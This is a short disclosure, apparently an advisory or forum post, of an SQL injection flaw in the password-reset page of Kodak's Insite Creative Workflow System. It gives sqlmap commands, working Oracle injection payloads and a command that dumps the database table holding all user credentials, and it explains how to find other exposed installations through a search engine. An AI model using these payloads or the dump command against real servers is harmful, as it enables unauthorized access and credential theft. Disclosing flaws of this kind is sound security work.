While investigating a recent installation of Kodak's Insite Creative Workflow System (for my current employer), an SQL Injection vulnerability was discovered in its "Forgot Your Password?" page.
An example of this application can be seen on the Kodak site.
Many other copies of Kodak Insite can be located with any search engine by looking for the string "insite creative login".
Our installation was setup on an internal site, and as such, SQLMAP was applied to our local copy, as follows.
sqlmap.py -u 'http://localhost/TwAmWeb/EmailPassword.asp' --data='user_name=1&Language=en' -p user_name --risk=3 --level=5 -o
sqlmap identified the following injection points with a total of 163 HTTP(s) requests: --- Place: POST Parameter: user_name Type: error-based Title: Oracle AND error-based - WHERE or HAVING clause (XMLType) Payload: user_name=1') AND 5065=(SELECT UPPER(XMLType(CHR(60)||CHR(58)||CHR(118)||CHR(110)||CHR(101)||CHR(58)||(SELECT (CASE WHEN (5065=5065) THEN 1 ELSE 0 END) FROM DUAL)||CHR(58)||CHR(116)||CHR(121)||CHR(112)||CHR(58)||CHR(62))) FROM DUAL) AND ('yCTb'='yCTb&Language=en
Type: AND/OR time-based blind Title: Oracle OR time-based blind Payload: user_name=-2979') OR
1635=DBMS_PIPE.RECEIVE_MESSAGE(CHR(76)||CHR(80)||CHR(114)||CHR(122),5) AND ('NjHU'='NjHU&Language=en --- [11:52:56] [INFO] the back-end DBMS is Oracle web server operating system: Windows 2003 web application technology: ASP.NET, Microsoft IIS 6.0, ASP back-end DBMS: Oracle [11:52:56] [WARNING] HTTP error codes detected during testing: 500 (Internal Server Error) - 44 times
A little fishing around and it becomes obvious that all usernames/passwords can be downloaded like this:
sqlmap.py -u 'http://localhost/TwAmWeb/EmailPassword.asp' --data='user_name=1&Language=en' --risk=3 --level=5 -o -D PRINERGY -T DBCS_REMOTEUSER --columns --dump
Supposedly Kodak will be releasing a fix in September.